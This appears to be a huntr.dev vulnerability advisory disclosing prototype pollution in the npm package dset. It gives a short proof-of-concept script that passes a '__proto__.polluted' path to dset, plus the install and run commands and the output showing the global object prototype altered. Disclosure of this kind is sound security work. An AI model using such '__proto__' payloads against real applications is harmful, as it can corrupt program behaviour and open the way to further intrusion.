Lucene search

K
huntrReady-research1-NPM-DSET
HistoryJan 10, 2021 - 12:00 a.m.

Prototype Pollution in lukeed/dset

2021-01-1000:00:00
ready-research
www.huntr.dev
9

0.011 Low

EPSS

Percentile

84.7%

Description

dset is vulnerable to Prototype Pollution.

Proof of Concept

  1. Create the following PoC file:
// poc.js
var dset = require("dset")
var obj = {}
console.log("Before : " + {}.polluted);
dset(obj, '__proto__.polluted', 'Yes! Its Polluted');
console.log("After : " + {}.polluted);
  1. Execute the following commands in terminal:
npm i dset # Install affected module
node poc.js #  Run the PoC
  1. Check the Output:
Before : undefined
After : Yes! Its Polluted

0.011 Low

EPSS

Percentile

84.7%